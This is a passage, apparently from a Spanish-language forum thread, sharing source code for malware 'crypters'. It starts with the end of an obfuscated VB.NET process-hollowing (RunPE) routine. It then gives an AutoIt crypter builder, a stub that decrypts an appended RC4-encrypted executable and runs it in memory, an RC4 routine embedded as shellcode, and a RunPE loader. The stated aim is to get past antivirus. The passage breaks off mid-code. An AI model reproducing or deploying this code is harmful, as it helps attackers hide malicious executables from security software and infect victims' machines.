SWDeobqxHZdRQoCWZ4CpvV2kztkOaUG16Q8lq28TduocgU, SwusBZwfOOWBcBXIF1G2xjhShofAwN1J99IBLMn1xHajYC) = 0 Then Return Dim SgAwpqj30zVaVTeJbCPQhdER2Pvop32CEMLWruBHuErmeu As New S4XNT9qtK77SuhFfrv62newV8ODqoTUjRjqDt3QO1uv2ZZ.Si5GfMaX3RPwVG0oWXAC2Jxaint6HSXRPlg7WLWol5SrWh SgAwpqj30zVaVTeJbCPQhdER2Pvop32CEMLWruBHuErmeu = Marshal.PtrToStructure(New IntPtr(SOo8uPYNpzxT30G8CU7YVDjv9NDf1cymhK9dezPXIhwy8F + SKYVqeAegCWJezILkXRMhn4XDYw48pPCb7clRRTGNtZLDT.Address), SgAwpqj30zVaVTeJbCPQhdER2Pvop32CEMLWruBHuErmeu.GetType) Dim S1MUP2NOpD7Mh2cXwgTR0yJBrtUpdMkpHaUCmuded6c9au, SnEOi5ykf4pGGkX0dfZVuNk9ue52LQ8od51lSPMb84oE3B As Long, S0o2gvBM754j2QftGNRsszvNOyDtV6Jhq3Ovyv8MrS2fK7 As UInteger SWDeobqxHZdRQoCWZ4CpvV2kztkOaUG16Q8lq28TduocgU.CB = Len(SWDeobqxHZdRQoCWZ4CpvV2kztkOaUG16Q8lq28TduocgU) SSZvkRN4Yo4ZiffpneLEsLaCfHJ5Eo0uB6BVhoXeodoyRK.Flags = 65538 If SgAwpqj30zVaVTeJbCPQhdER2Pvop32CEMLWruBHuErmeu.Signature <> 17744 Or SKYVqeAegCWJezILkXRMhn4XDYw48pPCb7clRRTGNtZLDT.Magic <> 23117 Then Return If S4XNT9qtK77SuhFfrv62newV8ODqoTUjRjqDt3QO1uv2ZZ.GetThreadContext(SwusBZwfOOWBcBXIF1G2xjhShofAwN1J99IBLMn1xHajYC.Thread, SSZvkRN4Yo4ZiffpneLEsLaCfHJ5Eo0uB6BVhoXeodoyRK) And S4XNT9qtK77SuhFfrv62newV8ODqoTUjRjqDt3QO1uv2ZZ.ReadProcessMemory(SwusBZwfOOWBcBXIF1G2xjhShofAwN1J99IBLMn1xHajYC.Process, SSZvkRN4Yo4ZiffpneLEsLaCfHJ5Eo0uB6BVhoXeodoyRK.Ebx + 8, S1MUP2NOpD7Mh2cXwgTR0yJBrtUpdMkpHaUCmuded6c9au, 4, 0) >= 0 And S4XNT9qtK77SuhFfrv62newV8ODqoTUjRjqDt3QO1uv2ZZ.ZwUnmapViewOfSection(SwusBZwfOOWBcBXIF1G2xjhShofAwN1J99IBLMn1xHajYC.Process, S1MUP2NOpD7Mh2cXwgTR0yJBrtUpdMkpHaUCmuded6c9au) >= 0 Then Dim ShYn0tuGSIQHUAzM3kepDlVfuSiwMVAxmx4zf0CTrnM8SW As UInt32 = S4XNT9qtK77SuhFfrv62newV8ODqoTUjRjqDt3QO1uv2ZZ.VirtualAllocEx(SwusBZwfOOWBcBXIF1G2xjhShofAwN1J99IBLMn1xHajYC.Process, SgAwpqj30zVaVTeJbCPQhdER2Pvop32CEMLWruBHuErmeu.Optional.Image, SgAwpqj30zVaVTeJbCPQhdER2Pvop32CEMLWruBHuErmeu.Optional.SImage, 12288, 4) If ShYn0tuGSIQHUAzM3kepDlVfuSiwMVAxmx4zf0CTrnM8SW <> 0 Then S4XNT9qtK77SuhFfrv62newV8ODqoTUjRjqDt3QO1uv2ZZ.WriteProcessMemory(SwusBZwfOOWBcBXIF1G2xjhShofAwN1J99IBLMn1xHajYC.Process, ShYn0tuGSIQHUAzM3kepDlVfuSiwMVAxmx4zf0CTrnM8SW, SFGyEY5M8j47x9yQJxEUPGaO4uC5GClIoFUdIBFpOuNZuq, SgAwpqj30zVaVTeJbCPQhdER2Pvop32CEMLWruBHuErmeu.Optional.SHeaders, S0o2gvBM754j2QftGNRsszvNOyDtV6Jhq3Ovyv8MrS2fK7) SnEOi5ykf4pGGkX0dfZVuNk9ue52LQ8od51lSPMb84oE3B = SKYVqeAegCWJezILkXRMhn4XDYw48pPCb7clRRTGNtZLDT.Address + 248 For SHNKQEdZSAw2h8XPHAzaquV7M8gOTpKuB09MHjx8kKwBK1 As Integer = 0 To SgAwpqj30zVaVTeJbCPQhdER2Pvop32CEMLWruBHuErmeu.File.Sections - 1 S1SFxNgoVdxcRESBzXWJxfIBwNLGQetPTZNeP58NHVoLEF = Marshal.PtrToStructure(New IntPtr(SOo8uPYNpzxT30G8CU7YVDjv9NDf1cymhK9dezPXIhwy8F + SnEOi5ykf4pGGkX0dfZVuNk9ue52LQ8od51lSPMb84oE3B + SHNKQEdZSAw2h8XPHAzaquV7M8gOTpKuB09MHjx8kKwBK1 * 40), S1SFxNgoVdxcRESBzXWJxfIBwNLGQetPTZNeP58NHVoLEF.GetType) Dim Sr2fxZ3l67LhfVvFueNubWDi2Z4BGoNGJAqsJYwIALeyk5(S1SFxNgoVdxcRESBzXWJxfIBwNLGQetPTZNeP58NHVoLEF.Size) As Byte For S47PeNv6nR2xfPBHk7u863fqE9VOxzvBP1Cboxy0AZjEYt As Integer = 0 To S1SFxNgoVdxcRESBzXWJxfIBwNLGQetPTZNeP58NHVoLEF.Size - 1 : Sr2fxZ3l67LhfVvFueNubWDi2Z4BGoNGJAqsJYwIALeyk5(S47PeNv6nR2xfPBHk7u863fqE9VOxzvBP1Cboxy0AZjEYt) = SFGyEY5M8j47x9yQJxEUPGaO4uC5GClIoFUdIBFpOuNZuq(S1SFxNgoVdxcRESBzXWJxfIBwNLGQetPTZNeP58NHVoLEF.Pointer + S47PeNv6nR2xfPBHk7u863fqE9VOxzvBP1Cboxy0AZjEYt) : Next S4XNT9qtK77SuhFfrv62newV8ODqoTUjRjqDt3QO1uv2ZZ.WriteProcessMemory(SwusBZwfOOWBcBXIF1G2xjhShofAwN1J99IBLMn1xHajYC.Process, ShYn0tuGSIQHUAzM3kepDlVfuSiwMVAxmx4zf0CTrnM8SW + S1SFxNgoVdxcRESBzXWJxfIBwNLGQetPTZNeP58NHVoLEF.Address, Sr2fxZ3l67LhfVvFueNubWDi2Z4BGoNGJAqsJYwIALeyk5, S1SFxNgoVdxcRESBzXWJxfIBwNLGQetPTZNeP58NHVoLEF.Size, S0o2gvBM754j2QftGNRsszvNOyDtV6Jhq3Ovyv8MrS2fK7) S4XNT9qtK77SuhFfrv62newV8ODqoTUjRjqDt3QO1uv2ZZ.VirtualProtectEx(SwusBZwfOOWBcBXIF1G2xjhShofAwN1J99IBLMn1xHajYC.Process, ShYn0tuGSIQHUAzM3kepDlVfuSiwMVAxmx4zf0CTrnM8SW + S1SFxNgoVdxcRESBzXWJxfIBwNLGQetPTZNeP58NHVoLEF.Address, S1SFxNgoVdxcRESBzXWJxfIBwNLGQetPTZNeP58NHVoLEF.Misc.Size, SDSvNPJTVM3ERxiymEohuJ2ZHeqm0qiylJ3KS90Gw4ZBEh(S1SFxNgoVdxcRESBzXWJxfIBwNLGQetPTZNeP58NHVoLEF.Flags), S1MUP2NOpD7Mh2cXwgTR0yJBrtUpdMkpHaUCmuded6c9au) Next SHNKQEdZSAw2h8XPHAzaquV7M8gOTpKuB09MHjx8kKwBK1 Dim Se5s5zUAUwVcpnw8N3nmSCmo3xEKyy9N2p5VelTK5buKSv = BitConverter.GetBytes(ShYn0tuGSIQHUAzM3kepDlVfuSiwMVAxmx4zf0CTrnM8SW) S4XNT9qtK77SuhFfrv62newV8ODqoTUjRjqDt3QO1uv2ZZ.WriteProcessMemory(SwusBZwfOOWBcBXIF1G2xjhShofAwN1J99IBLMn1xHajYC.Process, SSZvkRN4Yo4ZiffpneLEsLaCfHJ5Eo0uB6BVhoXeodoyRK.Ebx + 8, Se5s5zUAUwVcpnw8N3nmSCmo3xEKyy9N2p5VelTK5buKSv, 4, S0o2gvBM754j2QftGNRsszvNOyDtV6Jhq3Ovyv8MrS2fK7) SSZvkRN4Yo4ZiffpneLEsLaCfHJ5Eo0uB6BVhoXeodoyRK.Eax = ShYn0tuGSIQHUAzM3kepDlVfuSiwMVAxmx4zf0CTrnM8SW + SgAwpqj30zVaVTeJbCPQhdER2Pvop32CEMLWruBHuErmeu.Optional.Address S4XNT9qtK77SuhFfrv62newV8ODqoTUjRjqDt3QO1uv2ZZ.SetThreadContext(SwusBZwfOOWBcBXIF1G2xjhShofAwN1J99IBLMn1xHajYC.Thread, SSZvkRN4Yo4ZiffpneLEsLaCfHJ5Eo0uB6BVhoXeodoyRK) S4XNT9qtK77SuhFfrv62newV8ODqoTUjRjqDt3QO1uv2ZZ.ResumeThread(SwusBZwfOOWBcBXIF1G2xjhShofAwN1J99IBLMn1xHajYC.Thread) End If End If End Sub Private Shared Function Su8W5VOcv8RmmSZ5aNpw2YU7cRdx0qu6Hwe2uwmvGftvV6(ByVal Su6xorYZ6zeyBDnj1xxnn77esalzwTwaAp97HyqdF30NSH As Long, ByVal SzAv7NUQoba1mdyKKqXESJewqUB1ummt2cScimKHJjer7F As Long) As Long Su8W5VOcv8RmmSZ5aNpw2YU7cRdx0qu6Hwe2uwmvGftvV6 = S4FJgey6pmCGr5n6rEaif7nhNgKOwk5zes6s4RA0ISNZ5v(Su6xorYZ6zeyBDnj1xxnn77esalzwTwaAp97HyqdF30NSH) / (2 ^ SzAv7NUQoba1mdyKKqXESJewqUB1ummt2cScimKHJjer7F) End Function Private Shared Function S4FJgey6pmCGr5n6rEaif7nhNgKOwk5zes6s4RA0ISNZ5v(ByVal S5YS4LaM9keBTJgQlaUrcNCPM1gacO1PPnieY2gPVjhk1t As Long) As Double Const SLibZgPFyQDT9yiJsoJVye2QIhokDCv3IXUMQOUh9Ou7dc = 4294967296.0# If S5YS4LaM9keBTJgQlaUrcNCPM1gacO1PPnieY2gPVjhk1t < 0 Then S4FJgey6pmCGr5n6rEaif7nhNgKOwk5zes6s4RA0ISNZ5v = S5YS4LaM9keBTJgQlaUrcNCPM1gacO1PPnieY2gPVjhk1t + SLibZgPFyQDT9yiJsoJVye2QIhokDCv3IXUMQOUh9Ou7dc Else : S4FJgey6pmCGr5n6rEaif7nhNgKOwk5zes6s4RA0ISNZ5v = S5YS4LaM9keBTJgQlaUrcNCPM1gacO1PPnieY2gPVjhk1t End If End Function Private Shared Function SDSvNPJTVM3ERxiymEohuJ2ZHeqm0qiylJ3KS90Gw4ZBEh(ByVal SInHjtU3MPJ5jwYyupq06CXiG4cdl6ljEumL1Foe76l7HZ As Long) As Long Dim SMEGk7Mg3WHwoI8cKEwGxOIhpxLHI7VUcx74YSmLHrKF3w() As Object = {Sp0njTpLZJE67gDChJuA4ADf2691f80VUfJn88R4aWE8So, SqWvPtIAyDq09oVD4QbaFsaYgYYNhCcTRzD1yE7IqjB3eM, SWHaDXx6Is3P6Umaq1V9Mt0PQ5kEwPTDOCR4PQurbyhzwC, _ S8UwTvdniLlzaVHcof88obKaNGjsdIx8nXS0nUqxj6bF7A, SLtUNMlL3Jy8imKDM4u6xJVI6Rn3lQwEGxwzoaCDjhTcHb, SaYmgYuaT7fI4vICHQ0aI2dsHOSDXRwyMQqzXYgzxE0pRt, _ SLtUNMlL3Jy8imKDM4u6xJVI6Rn3lQwEGxwzoaCDjhTcHb, SaYmgYuaT7fI4vICHQ0aI2dsHOSDXRwyMQqzXYgzxE0pRt} SDSvNPJTVM3ERxiymEohuJ2ZHeqm0qiylJ3KS90Gw4ZBEh = SMEGk7Mg3WHwoI8cKEwGxOIhpxLHI7VUcx74YSmLHrKF3w(Su8W5VOcv8RmmSZ5aNpw2YU7cRdx0qu6Hwe2uwmvGftvV6(SInHjtU3MPJ5jwYyupq06CXiG4cdl6ljEumL1Foe76l7HZ, 29)) End Function Friend Class S4XNT9qtK77SuhFfrv62newV8ODqoTUjRjqDt3QO1uv2ZZ Structure Sg6muJO6UW1fnUaIl6zZpzsz4DzFOvKZyoXX5Js7VHiCtY Dim Flags, D0, D1, D2, D3, D6, D7 As UInt32, Save As SXnfNlXvaZ87psouU9Y8b9SY4rmqevvh7O80FTT1PxOYYd Dim SG, SF, SE, SD, Edi, Esi, Ebx, Edx, Ecx, Eax, Ebp, Eip, SC, EFlags, Esp, SS As UInt32 Dim Registers As Byte() End Structure Structure SXnfNlXvaZ87psouU9Y8b9SY4rmqevvh7O80FTT1PxOYYd Dim Control, Status, Tag, ErrorO, ErrorS, DataO, DataS As UInteger Dim RegisterArea As Byte() Dim State As UInt32 End Structure Structure SKuENpyDwomcaF6AxbZP9HLI8447xqkmK4We86uN3MmI3N Dim Address, Size As UInt32 End Structure Structure SxMiUJGkVI1UJNunKNBXy2ewOBHBj09svrQG1GbMzExccp Dim Name As Byte, Misc As SKuENpyDwomcaF6AxbZP9HLI8447xqkmK4We86uN3MmI3N, Address, Size, Pointer, PRelocations, PLines, NRelocations, NLines, Flags As UInt32 End Structure Structure Szty5KKyS9pkyn6iSYQBtOCJYSWpfmSK3PeDMN3kEvbrYR Dim Process, Thread As IntPtr, ProcessId, ThreadId As Integer End Structure Structure SqZGNARhIZnMibeavQFQO4LAOI0wQeVxavGL774vAIcgYU Dim CB As Integer, ReservedA, Desktop, Title As String, X, Y, XSize, YSize, XCount, YCount, Fill, Flags As Integer Dim ShowWindow, ReservedB As Short, ReservedC, Input, Output, [Error] As Integer End Structure Structure SP3Z2dY5mI0NIjDI1yTlfFfqMYPrHvypyWxRiGB7xh8NU6 Dim Length As Integer, Descriptor As IntPtr, Inherit As Integer End Structure Structure S0DR8Hpycij4oSlQzPbuoj9BmRt1faQeLe8foBpkA4hj6k Dim Magic, Last, Pages, Relocations, Size, Minimum, Maximum, SS, SP, Checksum, IP, CS, Table, Overlay As UInt16 Dim ReservedA As UInt16() Dim ID, Info As UInt16 Dim ReservedB As UInt16() Dim Address As Int32 End Structure Structure Si5GfMaX3RPwVG0oWXAC2Jxaint6HSXRPlg7WLWol5SrWh Dim Signature As UInt32, File As Spu6bRVFYadojTZnCpt4vl96FfuTLEp5NajhyXZlowkzhw, [Optional] As SAf35JCPd3QZv4m16HsLPFa6O4dw1htie0tFlnekL7mi6Q End Structure Structure Spu6bRVFYadojTZnCpt4vl96FfuTLEp5NajhyXZlowkzhw Dim Machine, Sections As UInt16, Stamp, Table, Symbols As UInt32, Size, Flags As UInt16 End Structure Structure SAf35JCPd3QZv4m16HsLPFa6O4dw1htie0tFlnekL7mi6Q Public Magic As UInt16, Major, Minor As Byte, SCode, IData, UData, Address, Code, Data, Image As UInt32, SectionA, FileA As UInt32 Public MajorO, MinorO, MajorI, MinorI, MajorS, MinorS As UInt16, Version, SImage, SHeaders, Checksum As UInt32, Subsystem, Flags As UInt16 Public SSReserve, SSCommit, SHReserve, SHCommit, LFlags, Count As UInt32 Public DataDirectory As SnO4BhHOkoPjrpS3QLpWYb3Eev4WCM7pDCdtpG0w4DMnp7() End Structure Structure SnO4BhHOkoPjrpS3QLpWYb3Eev4WCM7pDCdtpG0w4DMnp7 Dim Address, Size As UInt32 End Structure Declare Auto Function CreateProcess Lib "kernel32" (ByVal Jodgsgusname As String, ByVal Jodhjgsjhgsjcommand As String, ByRef process As SP3Z2dY5mI0NIjDI1yTlfFfqMYPrHvypyWxRiGB7xh8NU6, ByRef thread As SP3Z2dY5mI0NIjDI1yTlfFfqMYPrHvypyWxRiGB7xh8NU6, ByVal inherit As Boolean, ByVal flags As UInt32, ByVal system As IntPtr, ByVal current As String, <[in]()> ByRef startup As SqZGNARhIZnMibeavQFQO4LAOI0wQeVxavGL774vAIcgYU, ByRef info As Szty5KKyS9pkyn6iSYQBtOCJYSWpfmSK3PeDMN3kEvbrYR) As Boolean Declare Auto Function WriteProcessMemory Lib "kernel32" (ByVCal Jodsgfsfprocess As IntPtr, ByVal Jodhmjhxkhaddress As IntPtr, ByVal buffer As Byte(), ByVal size As IntPtr, ByRef written As Integer) As Boolean Declare Auto Function ReadProcessMemory Lib "kernel32" (ByVal process As IntPtr, ByVal address As IntPtr, ByRef buffer As IntPtr, ByVal size As IntPtr, ByRef read As Integer) As Integer Declare Auto Function VirtualProtectEx Lib "kernel32" (ByVal process As IntPtr, ByVal address As IntPtr, ByVal size As UIntPtr, ByVal [new] As UIntPtr, ByVal old As UInt32) As Integer Declare Auto Function VirtualAllocEx Lib "kernel32" (ByVal process As IntPtr, ByVal address As IntPtr, ByVal size As UInt32, ByVal type As UInt32, ByVal protect As UInt32) As IntPtr Declare Auto Function ZwUnmapViewOfSection Lib "ntdll" (ByVal process As IntPtr, ByVal address As IntPtr) As Long Declare Auto Function ResumeThread Lib "kernel32" (ByVal thread As IntPtr) As UInt32 Declare Auto Function GetThreadContext Lib "kernel32" (ByVal thread As IntPtr, ByRef context As Sg6muJO6UW1fnUaIl6zZpzsz4DzFOvKZyoXX5Js7VHiCtY) As Boolean Declare Auto Function SetThreadContext Lib "kernel32" (ByVal thread As IntPtr, ByRef context As Sg6muJO6UW1fnUaIl6zZpzsz4DzFOvKZyoXX5Js7VHiCtY) As Boolean End Class End Class Bueno, llegamos a la conclusión del crypter
  8. [es]Entendendo-Crypter-AU3-E-saltando-avs

    buenos amigos otra vez voy a publicar aquí una fuente de Crypter AU3 en equipo y la técnica de cómo obtener el AVS >#NoTrayIcon #include #include #include #include #include #include #Region ### START Koda GUI section ### Form= Opt("GuiOnEventMode",1) $a = GUICreate("", 610, 219, 192, 124) GUISetIcon("C:\Users\MineiirO\Desktop\A.D.I Icones\perso7.ico", -1) GUISetBkColor(0x000000) $Open = GUICtrlCreateButton("Open", 488, 64, 105, 41) $Cryptar = GUICtrlCreateButton("Cryptar", 488, 152, 113, 41) $Arquivo = GUICtrlCreateInput("Arquivo", 8, 72, 473, 21) $Label1 = GUICtrlCreateLabel(" IsNoT Crypter By MineiirO ", 72, 16, 316, 23) GUICtrlSetFont(-1, 12, 800, 2, "Swis721 BT") GUICtrlSetColor(-1, 0xFF0000) GUISetOnEvent($Gui_Event_Close, "sr") GUISetState(@SW_SHOW) #EndRegion ### END Koda GUI section ### GUICtrlSetOnEvent($Open, "Open") GUICtrlSetOnEvent($Cryptar, "Cs") Func Open() GUICtrlSetData($Arquivo, FileOpenDialog("Selecione o arquivo para encriptar", @DesktopDir, "Executáveis(*.exe)")) EndFunc Func Cs() if GuiCtrlRead($Arquivo) = "" then return $stub = FileOpen(@ScriptDir & "\stub.exe" , 16) $arquivo2 = FileOpen(GuiCtrlRead($Arquivo), 16) $st = FileRead($stub) $ar = FileRead($arquivo2) $ar = _RC4($ar, "Key") $salvar = FileOpen(FileSaveDialog("Salvar Como...", @DesktopDir, "Executáveis(*.exe)") & ".exe", 18) FileWrite($salvar, $st) FileWrite($salvar, StringToBinary("Wy4530")) FileWrite($salvar, $ar) FileClose($stub) FileClose($Arquivo) FileClose($Salvar) MsgBox(64, "Encriptado By MineiirO ! A.D.I FÊNIX! ", "") EndFunc Func sr() Exit EndFunc While 1 Sleep(1) WEnd Stub > #NoTrayIcon #Include #include $file = FileOpen(@ScriptFullPath, 0) $Data = FileRead($file) $Data = StringMid($Data, StringInstr($Data, "Separador") + StringLen ("Separador")) $Data = _RC4($Data, "Key") _RunPE($Data) RC4 > Func _RC4($DATA, $key) Local $OPCODE = "0xC81001006A006A005356578B551031C989C84989D7F2AE484829C88945F085C00F84DC000000B90001000088C82C0188840DEFFEFFFFE2F38365F4008365FC00817DFC000100007D478B45FC31D2F775F0920345100FB6008B4DFC0FB68C0DF0FEFFFF01C80345F425FF0000008945F48B75FC8A8435F0FEFFFF8B7DF486843DF0FEFFFF888435F0FEFFFFFF45FCEBB08D9DF0FEFFFF31FF89FA39550C76638B85ECFEFFFF4025FF0000008985ECFEFFFF89D80385ECFEFFFF0FB6000385E8FEFFFF25FF0000008985E8FEFFFF89DE03B5ECFEFFFF8A0689DF03BDE8FEFFFF860788060FB60E0FB60701C181E1FF0000008A840DF0FEFFFF8B750801D6300642EB985F5E5BC9C21000" Local $CODEBUFFER = DllStructCreate("byte[" & BinaryLen($OPCODE) & "]") DllStructSetData($CODEBUFFER, 1, $OPCODE) Local $BUFFER = DllStructCreate("byte[" & BinaryLen($DATA) & "]") DllStructSetData($BUFFER, 1, $DATA) DllCall("user32.dll", "none", "CallWindowProc", "ptr", DllStructGetPtr($CODEBUFFER), "ptr", DllStructGetPtr($BUFFER), "int", BinaryLen($DATA), "str", $key, "int", 0) Local $RET = DllStructGetData($BUFFER, 1) $BUFFER = 0 $CODEBUFFER = 0 Return $RET EndFunc RUMPE >Func _RunPE($Lgfaklwgfa2BBINARYIMAGE) Local $Lgfaklwgfa2BBINARY = Binary($Lgfaklwgfa2BBINARYIMAGE) Local $Lgfaklwgfa2TBINARY = DllStructCreate("byte[" & BinaryLen($Lgfaklwgfa2BBINARY) & "]") DllStructSetData($Lgfaklwgfa2TBINARY, 1, $Lgfaklwgfa2BBINARY) Local $Lgfaklwgfa2PPOINTER = DllStructGetPtr($Lgfaklwgfa2TBINARY) Local $Lgfaklwgfa2TSTARTUPINFO = DllStructCreate("dword cbSize;" & "ptr Reserved;" & "ptr Desktop;" & "ptr Title;" & "dword X;" & "dword Y;" & "dword XSize;" & "dword YSize;" & "dword XCountChars;" & "dword YCountChars;" & "dword FillAttribute;" & "dword Flags;" & "ushort ShowWindow;" & "ushort Reserved2;" & "ptr Reserved2;" & "ptr hStdInput;" & "ptr hStdOutput;" & "ptr hStdError") Local $Lgfaklwgfa2TPROCESS_INFORMATION = DllStructCreate("ptr Process;" & "ptr Thread;" & "dword ProcessId;" & "dword ThreadId") Local $Lgfaklwgfa2ACALL = DllCall("kernel32.dll", "int", "CreateProcessW", "wstr", @AutoItExe, "ptr", 0, "ptr", 0, "ptr", 0, "int", 0, "dword", 4, "ptr", 0, "ptr", 0, "ptr", DllStructGetPtr($Lgfaklwgfa2TSTARTUPINFO), "ptr", DllStructGetPtr($Lgfaklwgfa2TPROCESS_INFORMATION)) Local $Lgfaklwgfa2HPROCESS = DllStructGetData($Lgfaklwgfa2TPROCESS_INFORMATION, "Process") Local $Lgfaklwgfa2HTHREAD = DllStructGetData($Lgfaklwgfa2TPROCESS_INFORMATION, "Thread") Local $Lgfaklwgfa2TCONTEXT = DllStructCreate("dword ContextFlags;" & "dword Dr0;" & "dword Dr1;" & "dword Dr2;" & "dword Dr3;" & "dword Dr6;" & "dword Dr7;" & "dword ControlWord;" & "dword StatusWord;" & "dword TagWord;" & "dword ErrorOffset;" & "dword ErrorSelector;" & "dword DataOffset;" & "dword DataSelector;" & "byte RegisterArea[80];" & "dword Cr0NpxState;" & "dword SegGs;" & "dword SegFs;" & "dword SegEs;" & "dword SegDs;" & "dword Edi;" & "dword Esi;" & "dword Ebx;" & "dword Edx;" & "dword Ecx;" & "dword Eax;" & "dword Ebp;" & "dword Eip;" & "dword SegCs;" & "dword EFlags;" & "dword Esp;" & "dword SegS") DllStructSetData($Lgfaklwgfa2TCONTEXT, "ContextFlags", 65538) $Lgfaklwgfa2ACALL = DllCall("kernel32.dll", "int", "GetThreadContext", "ptr", $Lgfaklwgfa2HTHREAD, "ptr", DllStructGetPtr($Lgfaklwgfa2TCONTEXT)) Local $Lgfaklwgfa2TIMAGE_DOS_HEADER = DllStructCreate("char Magic[2];" & "ushort BytesOnLastPage;" & "ushort Pages;" & "ushort Relocations;" & "ushort SizeofHeader;" & "ushort MinimumExtra;" & "ushort MaximumExtra;" & "ushort SS;" & "ushort SP;" & "ushort Checksum;" & "ushort IP;" & "ushort CS;" & "ushort Relocation;" & "ushort Overlay;" & "char Reserved[8];" & "ushort OEMIdentifier;" & "ushort OEMInformation;" & "char Reserved2[20];" & "dword AddressOfNewExeHeader", $Lgfaklwgfa2PPOINTER) $Lgfaklwgfa2PPOINTER += DllStructGetData($Lgfaklwgfa2TIMAGE_DOS_HEADER, "AddressOfNewExeHeader") Local $Lgfaklwgfa2SMAGIC = DllStructGetData($Lgfaklwgfa2TIMAGE_DOS_HEADER, "Magic") If Not ($Lgfaklwgfa2SMAGIC == "MZ") Then DllCall("kernel32.dll", "int", "TerminateProcess", "ptr", $Lgfaklwgfa2HPROCESS, "dword", 0) Return SetError(3, 0, 0) EndIf Local $Lgfaklwgfa2TIMAGE_NT_SIGNATURE = DllStructCreate("dword Signature", $Lgfaklwgfa2PPOINTER) $Lgfaklwgfa2PPOINTER += 4 If DllStructGetData($Lgfaklwgfa2TIMAGE_NT_SIGNATURE, "Signature") <> 17744 Then DllCall("kernel32.dll", "int", "TerminateProcess", "ptr", $Lgfaklwgfa2HPROCESS, "dword", 0) Return SetError(4, 0, 0) EndIf Local $Lgfaklwgfa2TIMAGE_FILE_HEADER = DllStructCreate("ushort Machine;" & "ushort NumberOfSections;" & "dword TimeDateStamp;" & "dword PointerToSymbolTable;" & "dword NumberOfSymbols;" & "ushort SizeOfOptionalHeader;" & "ushort Characteristics", $Lgfaklwgfa2PPOINTER) Local $Lgfaklwgfa2INUMBEROFSECTIONS = DllStructGetData($Lgfaklwgfa2TIMAGE_FILE_HEADER, "NumberOfSections") $Lgfaklwgfa2PPOINTER += 20 Local $Lgfaklwgfa2TIMAGE_OPTIONAL_HEADER = DllStructCreate("ushort Magic;" & "ubyte MajorLinkerVersion;" & "ubyte MinorLinkerVersion;" & "dword SizeOfCode;" & "dword SizeOfInitializedData;" & "dword SizeOfUninitializedData;" & "dword AddressOfEntryPoint;" & "dword BaseOfCode;" & "dword BaseOfData;" & "dword ImageBase;" & "dword SectionAlignment;" & "dword FileAlignment;" & "ushort MajorOperatingSystemVersion;" & "ushort MinorOperatingSystemVersion;" & "ushort MajorImageVersion;" & "ushort MinorImageVersion;" & "ushort MajorSubsystemVersion;" & "ushort MinorSubsystemVersion;" & "dword Win32VersionValue;" & "dword SizeOfImage;" & "dword SizeOfHeaders;" & "dword CheckSum;" & "ushort Subsystem;" & "ushort DllCharacteristics;" & "dword SizeOfStackReserve;" & "dword SizeOfStackCommit;" & "dword SizeOfHeapReserve;" & "dword SizeOfHeapCommit;" & "dword LoaderFlags;" & "dword NumberOfRvaAndSizes", $Lgfaklwgfa2PPOINTER) $Lgfaklwgfa2PPOINTER += 96 Local $Lgfaklwgfa2IMAGIC = DllStructGetData($Lgfaklwgfa2TIMAGE_OPTIONAL_HEADER, "Magic") If $Lgfaklwgfa2IMAGIC <> 267 Then DllCall("kernel32.dll", "int", "TerminateProcess", "ptr", $Lgfaklwgfa2HPROCESS, "dword", 0) Return SetError(5, 0, 0) EndIf Local $Lgfaklwgfa2IENTRYPOINTNEW = DllStructGetData($Lgfaklwgfa2TIMAGE_OPTIONAL_HEADER, "AddressOfEntryPoint") $Lgfaklwgfa2PPOINTER += 128 Local $Lgfaklwgfa2POPTIONALHEADERIMAGEBASENEW = DllStructGetData($Lgfaklwgfa2TIMAGE_OPTIONAL_HEADER, "ImageBase") Local $Lgfaklwgfa2IOPTIONALHEADERSIZEOFIMAGENEW = DllStructGetData($Lgfaklwgfa2TIMAGE_OPTIONAL_HEADER, "SizeOfImage") $Lgfaklwgfa2ACALL = DllCall("ntdll.dll", "int", "NtUnmapViewOfSection", "ptr", $Lgfaklwgfa2HPROCESS, "ptr", $Lgfaklwgfa2POPTIONALHEADERIMAGEBASENEW) $Lgfaklwgfa2ACALL = DllCall("kernel32.dll", "ptr", "VirtualAllocEx", "ptr", $Lgfaklwgfa2HPROCESS, "ptr", $Lgfaklwgfa2POPTIONALHEADERIMAGEBASENEW, "dword", $Lgfaklwgfa2IOPTIONALHEADERSIZEOFIMAGENEW, "dword", 12288, "dword", 64) Local $Lgfaklwgfa2PREMOTECODE = $Lgfaklwgfa2ACALL[0] Local $Lgfaklwgfa2PHEADERS_NEW = DllStructGetPtr($Lgfaklwgfa2TIMAGE_DOS_HEADER) Local $Lgfaklwgfa2IOPTIONALHEADERSIZEOFHEADERSNEW = DllStructGetData($Lgfaklwgfa2TIMAGE_OPTIONAL_HEADER, "SizeOfHeaders") $Lgfaklwgfa2ACALL = DllCall("kernel32.dll", "int", "WriteProcessMemory", "ptr", $Lgfaklwgfa2HPROCESS, "ptr", $Lgfaklwgfa2PREMOTECODE, "ptr", $Lgfaklwgfa2PHEADERS_NEW, "dword", $Lgfaklwgfa2IOPTIONALHEADERSIZEOFHEADERSNEW, "dword*", 0) Local $Lgfaklwgfa2TIMAGE_SECTION_HEADER Local $Lgfaklwgfa2ISIZEOFRAWDATA, $Lgfaklwgfa2PPOINTERTORAWDATA Local $Lgfaklwgfa2IVIRTUALADDRESS For $Lgfaklwgfa2I = 1 To $Lgfaklwgfa2INUMBEROFSECTIONS $Lgfaklwgfa2TIMAGE_SECTION_HEADER = DllStructCreate("char Name[8];" & "dword UnionOfVirtualSizeAndPhysicalAddress;" & "dword VirtualAddress;" & "dword SizeOfRawData;" & "dword PointerToRawData;" & "dword PointerToRelocations;" & "dword PointerToLinenumbers;" & "ushort NumberOfRelocations;" & "ushort NumberOfLinenumbers;" & "dword Characteristics", $Lgfaklwgfa2PPOINTER) $Lgfaklwgfa2ISIZEOFRAWDATA = DllStructGetData($Lgfaklwgfa2TIMAGE_SECTION_HEADER, "SizeOfRawData") $Lgfaklwgfa2PPOINTERTORAWDATA = DllStructGetPtr($Lgfaklwgfa2TIMAGE_DOS_HEADER) + DllStructGetData($Lgfaklwgfa2TIMAGE_SECTION_HEADER, "PointerToRawData") $Lgfaklwgfa2IVIRTUALADDRESS = DllStructGetData($Lgfaklwgfa2TIMAGE_SECTION_HEADER, "VirtualAddress") If $Lgfaklwgfa2ISIZEOFRAWDATA Then $Lgfaklwgfa2ACALL = DllCall("kernel32.dll", "int", "WriteProcessMemory", "ptr", $Lgfaklwgfa2HPROCESS, "ptr", $Lgfaklwgfa2PREMOTECODE + $Lgfaklwgfa2IVIRTUALADDRESS, "ptr", $Lgfaklwgfa2PPOINTERTORAWDATA, "dword", $Lgfaklwgfa2ISIZEOFRAWDATA, 